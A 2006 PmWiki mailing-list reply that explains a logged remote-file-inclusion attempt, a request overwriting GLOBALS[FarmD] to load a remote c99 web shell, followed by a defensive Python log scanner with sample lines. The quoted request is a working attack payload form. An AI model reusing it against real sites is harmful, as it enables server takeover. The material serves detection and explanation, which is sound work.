[pmwiki-users] CSS style attack on PmWiki?

Patrick R. Michaud pmichaud at pobox.com
Wed Feb 1 15:18:42 CST 2006


On Thu, Feb 02, 2006 at 10:08:05AM +1300, Robin Sheat wrote:
> I just saw this in my logs:
> 198.87.3.70 - - [02/Feb/2006:09:26:49 +1300] 
> "GET /PmWiki/pmwiki.php?GLOBALS&GLOBALS[FarmD]=http://www.world-garments.com/q/c99shell.txt? 
> HTTP/1.1" 302 152 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sq-AL; 
> rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
> 
> Someone with a bit more PHP knowledge might know what they were trying to 
> do. It didn't work on my site, anyway, due to the URL rewriting I do 
> breaking things for them.

They're trying to attack the site using a bug in PHP 5's
register_globals handling.  This particular vulnerability was
closed for PmWiki in the last beta release, although it may still
affect other PHP scripts.

As long as your site is running with PHP's register_globals
disabled, you're safe from this particular attack.

Pm
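
A log check for the request pattern quoted above, as an added example that is not part of the original message or PmWiki's own code: it flags query parameters that name a PHP superglobal, and notes when the value is a remote URL. The sample log lines are constructed (documentation addresses and example.invalid), and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Combined Log Format: host ident user [time] "METHOD target HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) \S+'
)
# Parameter names that address a PHP superglobal, e.g. GLOBALS or GLOBALS[FarmD].
# PHP variable names are case-sensitive, so the match is too.
SUPERGLOBAL_RE = re.compile(
    r'^(?:GLOBALS|_(?:GET|POST|COOKIE|SERVER|ENV|FILES|REQUEST|SESSION))(?:\[|$)'
)
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)

def inspect_line(line):
    """Return a finding dict for one access-log line, or None if nothing matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    _, _, query = m["target"].partition("?")
    hits = []
    # parse_qsl percent-decodes names, so GLOBALS%5BFarmD%5D is caught as well;
    # keep_blank_values keeps a bare "GLOBALS" parameter that has no "=".
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SUPERGLOBAL_RE.match(name):
            kind = "superglobal-overwrite"
            if REMOTE_RE.match(value):
                kind += "+remote-url"
            hits.append((kind, name))
    if not hits:
        return None
    return {"host": m["host"], "status": int(m["status"]), "hits": hits}

def scan(lines):
    """Inspect every line and return only the findings."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample lines, modelled on the request quoted in the message.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Feb/2006:09:26:49 +1300] "GET /PmWiki/pmwiki.php?GLOBALS&GLOBALS[FarmD]=http://example.invalid/x.txt? HTTP/1.1" 302 152 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [02/Feb/2006:09:27:02 +1300] "GET /PmWiki/pmwiki.php?n=Main.HomePage&action=edit HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [02/Feb/2006:09:28:15 +1300] "GET /index.php?_SERVER%5BDOCUMENT_ROOT%5D=ftp://example.invalid/a HTTP/1.1" 200 10 "-" "-"',
    '192.0.2.13 - - [02/Feb/2006:09:29:40 +1300] "GET /index.php?globalsetting=1 HTTP/1.1" 200 10 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding only records that the request was made; the logged status code and the server's register_globals setting are what to check next.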



